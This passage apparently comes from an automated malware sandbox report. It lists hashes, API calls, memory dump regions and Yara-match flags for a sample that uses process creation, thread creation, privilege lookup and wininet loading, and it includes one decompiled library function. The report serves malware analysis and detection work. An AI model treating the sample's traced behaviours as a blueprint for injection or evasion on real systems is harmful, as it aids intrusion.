                • Opcode Fuzzy Hash: cbf47a9814421083680ef4e7d8db2a14114669e4e891f84e3afe25d3ef3976f3
                • Instruction Fuzzy Hash: 3F90027170100802D100659A5458786002597E0341F91D012A5014555ECBA588917172
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 5e4bbbecfe15b392b3fe18dbbebbb24b9702068ee089e018179d4c72541d76e3
                • Instruction ID: 09e3fcf95b6407dadd5ffd428f3cf2d1da99f214ab77d755a3211f48ef24f857
                • Opcode Fuzzy Hash: 5e4bbbecfe15b392b3fe18dbbebbb24b9702068ee089e018179d4c72541d76e3
                • Instruction Fuzzy Hash: A690027171114802D110615A8454746002597D1241F91C412A0814558D8BD588917163
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 1ab351e0395552d9ee9e79954a3609167e2fda33c56b6a245f2c1a1fa9749988
                • Instruction ID: 252965e65cbe3a757cf83a59f797845c8d815b9112942c0593a519a2c11b3a9c
                • Opcode Fuzzy Hash: 1ab351e0395552d9ee9e79954a3609167e2fda33c56b6a245f2c1a1fa9749988
                • Instruction Fuzzy Hash: 2190026971300402D180715A545874A002597D1242FD1D416A0005558CCE5588696362
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: c2af70ce37eb20067017d7fdf9b432cd2b33563a7e7559a7272031a024aba170
                • Instruction ID: ae3d7c3d15c5e2b77b24a71a293b6b47ebeb1e6f3c9a1878d9c22e25b4c6784a
                • Opcode Fuzzy Hash: c2af70ce37eb20067017d7fdf9b432cd2b33563a7e7559a7272031a024aba170
                • Instruction Fuzzy Hash: 8E90027170504C42D140715A4454B86003597D0345F91C012A0054694D9B658D55B6A2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 8bb027dd51c8525c9259da73ff3622ab8363534ffca3e2a317df65a67c0e826b
                • Instruction ID: 4f1b7fa6630763382fb38a0631ec86cf9a0532843b1ecd0a80e9abe799fb8de9
                • Opcode Fuzzy Hash: 8bb027dd51c8525c9259da73ff3622ab8363534ffca3e2a317df65a67c0e826b
                • Instruction Fuzzy Hash: D090027170100C02D180715A445478A002597D1341FD1C016A0015654DCF558A5977E2
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 767af8a92495bd4847b80af4d0556fddd2514e1e6eb336ed7ae803d6a70bb9c2
                • Instruction ID: 50484ed4fad482652bfa6d494a1512a9a5cd8c50cdf7978b260edd7070f4740c
                • Opcode Fuzzy Hash: 767af8a92495bd4847b80af4d0556fddd2514e1e6eb336ed7ae803d6a70bb9c2
                • Instruction Fuzzy Hash: A490027170100C42D100615A4454B86002597E0341F91C017A0114654D8B55C8517562
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 823888ecc26ab912aa6ad1b7544b098daf5a82226f3de741814422971b0f3025
                • Instruction ID: 00bc800183e422e7977309f85011d751ee92fb85bedf0836a12caccef7228d7a
                • Opcode Fuzzy Hash: 823888ecc26ab912aa6ad1b7544b098daf5a82226f3de741814422971b0f3025
                • Instruction Fuzzy Hash: 8D90027170108C02D110615A845478A002597D0341F95C412A4414658D8BD588917162
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 762b43fce521eb64c4f7dc81c669177613a338347857778442477182620e0ca0
                • Instruction ID: 51931c36bc82c2565680d553e041c78a89d18e66194e1a443470f2d7b392392d
                • Opcode Fuzzy Hash: 762b43fce521eb64c4f7dc81c669177613a338347857778442477182620e0ca0
                • Instruction Fuzzy Hash: 8A9002B170100802D140715A4454786002597D0341F91C012A5054554E8B998DD576A6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 16438201e0361c4138f7ab04d75afc728b342904a6ed0fbc8dfc9b8d56f7a21c
                • Instruction ID: 75698af99379944c04010f1436312e0cf676b478a057fc2b5c883a916389af49
                • Opcode Fuzzy Hash: 16438201e0361c4138f7ab04d75afc728b342904a6ed0fbc8dfc9b8d56f7a21c
                • Instruction Fuzzy Hash: 1C9002A174100842D100615A4464B460025D7E1341F91C016E1054554D8B59CC527167
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: f02cec2019961cac8f34818bb5e95e117c3c34cb8036302d13b9b2803b078ae8
                • Instruction ID: 6ba4e2a55c02fef34db4d5d3fd33492647885a595173c2a3c781c190822efa09
                • Opcode Fuzzy Hash: f02cec2019961cac8f34818bb5e95e117c3c34cb8036302d13b9b2803b078ae8
                • Instruction Fuzzy Hash: E6900261742045525545B15A44546474026A7E02817D1C013A1404950C8A669856E662
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: b1f99af6ca91b138c2932fad43552b66966c52c21c3dfad164092bcf4944d5da
                • Instruction ID: ec587d13ba5d8736999f7d49f550bdce62bacc455d759563aeed39d20198931e
                • Opcode Fuzzy Hash: b1f99af6ca91b138c2932fad43552b66966c52c21c3dfad164092bcf4944d5da
                • Instruction Fuzzy Hash: B590027170100813D111615A4554747002997D0281FD1C413A0414558D9B968952B162
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 2ce47891272b6507badb4028829be27019bf8c2236cbb029af3a08ccb9fce16a
                • Instruction ID: 5015a4bef8fb7198709c14147e40418787ca02df0f7d4ad977929fe3a9387a64
                • Opcode Fuzzy Hash: 2ce47891272b6507badb4028829be27019bf8c2236cbb029af3a08ccb9fce16a
                • Instruction Fuzzy Hash: 5390026171180442D200656A4C64B47002597D0343F91C116A0144554CCE5588616562
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(000007D0), ref: 00E47398
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: 84056b423c5b0bf5d1a81b45eadff41674d6777954e907abe7e15438b6e8a5c0
                • Instruction ID: 9240a239c7d9ea54a0403c5ca2f19a057b0b2c70e5d67fa3a07478bb2bd63746
                • Opcode Fuzzy Hash: 84056b423c5b0bf5d1a81b45eadff41674d6777954e907abe7e15438b6e8a5c0
                • Instruction Fuzzy Hash: AE31B0B6602700ABC711DF64D8A1FABB7F8EF48700F00851DFA5AAB241D730A805CBE0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(000007D0), ref: 00E47398
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Sleep
                • String ID: net.dll$wininet.dll
                • API String ID: 3472027048-1269752229
                • Opcode ID: 90572802cee8b01c70ec1edd6504c423d26dd7dfd137ce6ed864172b27c70b79
                • Instruction ID: a5ddcdaba763530dcc64efb6191dba5302a0ec538afc4ac7fe8058cd8703e03c
                • Opcode Fuzzy Hash: 90572802cee8b01c70ec1edd6504c423d26dd7dfd137ce6ed864172b27c70b79
                • Instruction Fuzzy Hash: BC21D2B6641305ABC710EF64D8A1FABB7F4FF48704F048529FA59AB241D770A805CBE1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E33B93), ref: 00E4890D
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID: .z`
                • API String ID: 3298025750-1441809116
                • Opcode ID: aab04feede0c81369f86af95e0fe16e15b2963dea8764cdab06d4164d709b9c3
                • Instruction ID: e86bdb84227d50c1f43e62cf23f53f59ed03112972d09c66143902cbaccbd7ec
                • Opcode Fuzzy Hash: aab04feede0c81369f86af95e0fe16e15b2963dea8764cdab06d4164d709b9c3
                • Instruction Fuzzy Hash: B0E06DB1600205AFDB18DF94DC4AE9BB7ACEF44750F114658FD08AB251D631E914CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00E33B93), ref: 00E4890D
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: FreeHeap
                • String ID: .z`
                • API String ID: 3298025750-1441809116
                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                • Instruction ID: 6af18c4e93360f1780f01d6d12945cc63e6f2266093f21f2c67a47a239456707
                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                • Instruction Fuzzy Hash: 4CE04FB12002086BD718DF59DC49EA777ACEF88750F014554FD0867342C630F910CAF0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlAllocateHeap.NTDLL(&5,?,00E43C9F,00E43C9F,?,00E43526,?,?,?,?,?,00000000,00000000,?), ref: 00E488CD
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: AllocateHeap
                • String ID: &5
                • API String ID: 1279760036-996528113
                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                • Instruction ID: b5d5e89ef03c7779c936d8896b3de5b44c315372c9d1c03bfc95be7893b15841
                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                • Instruction Fuzzy Hash: 5FE012B1200208ABDB18EF99DC45EA777ACAF88650F118558BE086B242C630F910CAB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E372DA
                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E372FB
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 115f433525a59ed3e67852031b53c2c34b79eea133e21c9938ae9c0c3efb8620
                • Instruction ID: f0485b39c59618823883a06d686d9b43c977a84dbaf640e434992739e205dee6
                • Opcode Fuzzy Hash: 115f433525a59ed3e67852031b53c2c34b79eea133e21c9938ae9c0c3efb8620
                • Instruction Fuzzy Hash: 846192B1900309AFDB24DF64DC8AFEB77E8EB45304F10546DF949A7241DB70AA01CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E489A4
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E3CFB2,00E3CFB2,?,00000000,?,?), ref: 00E48A70
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateInternalLookupPrivilegeProcessValue
                • String ID:
                • API String ID: 65721159-0
                • Opcode ID: 0ce576a1dee061463efae5c90dc6431ad26301351cdeec3c9960568de656caad
                • Instruction ID: 0ce0ce604edfe849b803bb1f09449547c3e9d6e89dfb61955d04cc818d624c3e
                • Opcode Fuzzy Hash: 0ce576a1dee061463efae5c90dc6431ad26301351cdeec3c9960568de656caad
                • Instruction Fuzzy Hash: 0F211DB5200209AFDB14DF99DC84EEB77ADAF88750F158259FA4C97241D630E815CBB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E372DA
                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E372FB
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: MessagePostThread
                • String ID:
                • API String ID: 1836367815-0
                • Opcode ID: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                • Instruction ID: f26b17e360de07fa1bd27a6ebcb4787343720113d7160cba00dc2d34479bf2a0
                • Opcode Fuzzy Hash: 7a277fafb3f9668102af2c224306ddf972237c2bdd995d78dbfd703b77ee5a33
                • Instruction Fuzzy Hash: 0001A271A8022877F721AA949C43FBF7BAC5F01B51F140118FF04BA1C2EAD46A0687F6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E39BA2
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: Load
                • String ID:
                • API String ID: 2234796835-0
                • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                • Instruction ID: 14f2c79875214628c035b304a6b7577762ee5906ef46b069ec0c4f856b4f795e
                • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                • Instruction Fuzzy Hash: 6A0121B5E4020DABDF10DBE4EC46FDEB7B89B54308F0041A5E908A7242F671EB18CB91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E489A4
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: fb08b8a0239fd5112cc49cd1d34dfb3320bf8bca2b051ad8a370c8f5f34f8c5c
                • Instruction ID: 07134300986748c224c9ad946eda6a5d34fcdd333251511a2e3bf38c3db55663
                • Opcode Fuzzy Hash: fb08b8a0239fd5112cc49cd1d34dfb3320bf8bca2b051ad8a370c8f5f34f8c5c
                • Instruction Fuzzy Hash: 3F01AFB2201108BFCB58CF99DC81EEB77A9AF8C354F158258FA0DE7241C630E851CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E489A4
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateInternalProcess
                • String ID:
                • API String ID: 2186235152-0
                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                • Instruction ID: d63314f187b63b9d2328c7997d65f66c81774e047c193eb07d0d88651ccd0ee3
                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                • Instruction Fuzzy Hash: B701AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E3CCE0,?,?), ref: 00E4745C
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: 4a43effd3a67b88a8349b4f3cd013ddbc44425b3f3c5715f4600d761e9296872
                • Instruction ID: a1aa8446902c9a4b4e12f1dad480e4ac376f88e20b7ae24a9e4ecdb494511935
                • Opcode Fuzzy Hash: 4a43effd3a67b88a8349b4f3cd013ddbc44425b3f3c5715f4600d761e9296872
                • Instruction Fuzzy Hash: DAE06D333853043AE22065A9BC02FA7B69C8B91B24F140026FA4DEA2C1D995F90142A4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E3CCE0,?,?), ref: 00E4745C
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: CreateThread
                • String ID:
                • API String ID: 2422867632-0
                • Opcode ID: a177678509b3af6295f6288d43a2490040e671a2635e2e0a1b653272c6b75601
                • Instruction ID: 5d4e00e3765e7192c70c036b0d6b68440027f29a52b331463aa98d7b9d0e1476
                • Opcode Fuzzy Hash: a177678509b3af6295f6288d43a2490040e671a2635e2e0a1b653272c6b75601
                • Instruction Fuzzy Hash: E7F0657738120036E2206558AC03F9777998B95B24F244529F749BF7C2D59AF90642A5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E3CFB2,00E3CFB2,?,00000000,?,?), ref: 00E48A70
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: LookupPrivilegeValue
                • String ID:
                • API String ID: 3899507212-0
                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                • Instruction ID: 8bebc82fc0ebaebe4734153d86aa3ed5c825135f318857aa61d85802fc60c817
                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                • Instruction Fuzzy Hash: 16E01AB12002086BDB14DF49DC85EE737ADAF88650F018154BE0867242C930F8108BF5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SetErrorMode.KERNELBASE(00008003,?,?,00E37C83,?), ref: 00E3D44B
                Memory Dump Source
                • Source File: 00000014.00000002.622812715.0000000000E30000.00000040.00020000.sdmp, Offset: 00E30000, based on PE: false
                Yara matches
                Similarity
                • API ID: ErrorMode
                • String ID:
                • API String ID: 2340568224-0
                • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                • Instruction ID: 1e9fac953de0ef4424bddc5f269b0e7f93bf2dbd4071e21f6c4caabe3238633a
                • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                • Instruction Fuzzy Hash: A9D0A7717503043BE610FAA4AC07F2672CD5B54B04F494074F948E73C3D964F5008161
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: InitializeThunk
                • String ID:
                • API String ID: 2994545307-0
                • Opcode ID: 5a2efec5fcceaa2f76077a3787b7f878141282966c264ac6225a97e93a7f8d10
                • Instruction ID: 36b5d60a8956d79581bb6e4806d44598e5eca9b425d0ae9a0c43ea53b9c5072f
                • Opcode Fuzzy Hash: 5a2efec5fcceaa2f76077a3787b7f878141282966c264ac6225a97e93a7f8d10
                • Instruction Fuzzy Hash: 6AB09B71D014C5C5D611D7614608B67795177D0751F56C053D1020751B4778C095F5B6
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                C-Code - Quality: 53%
                			E054AFDDA(intOrPtr* __edx, intOrPtr _a4) {
                				void* _t7;
                				intOrPtr _t9;
                				intOrPtr _t10;
                				intOrPtr* _t12;
                				intOrPtr* _t13;
                				intOrPtr _t14;
                				intOrPtr* _t15;
                
                				_t13 = __edx;
                				_push(_a4);
                				_t14 =  *[fs:0x18];
                				_t15 = _t12;
                				_t7 = E0545CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                				_push(_t13);
                				E054A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                				_t9 =  *_t15;
                				if(_t9 == 0xffffffff) {
                					_t10 = 0;
                				} else {
                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                				}
                				_push(_t10);
                				_push(_t15);
                				_push( *((intOrPtr*)(_t15 + 0xc)));
                				_push( *((intOrPtr*)(_t14 + 0x24)));
                				return E054A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                			}

                APIs
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 054AFDFA
                Strings
                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 054AFE01
                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 054AFE2B
                Memory Dump Source
                • Source File: 00000014.00000002.627202964.00000000053F0000.00000040.00000001.sdmp, Offset: 053F0000, based on PE: true
                • Associated: 00000014.00000002.629802362.000000000550B000.00000040.00000001.sdmp
                • Associated: 00000014.00000002.629817947.000000000550F000.00000040.00000001.sdmp
                Similarity
                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                • API String ID: 885266447-3903918235
                • Opcode ID: 519200b3243861486e0cffdb645350edda9c5e4e5730e1434ddb3fff4aa1d530
                • Instruction ID: 6060d282b4100ad26dc00b8b2ecd5856ddc08c5b773f19d901459746b84be046
                • Opcode Fuzzy Hash: 519200b3243861486e0cffdb645350edda9c5e4e5730e1434ddb3fff4aa1d530
                • Instruction Fuzzy Hash: 3BF0FC372442017FDB211A45DC49FB3BF6AEB54730F240316F628595D1E972F82096F4
                Uniqueness

                Uniqueness Score: -1.00%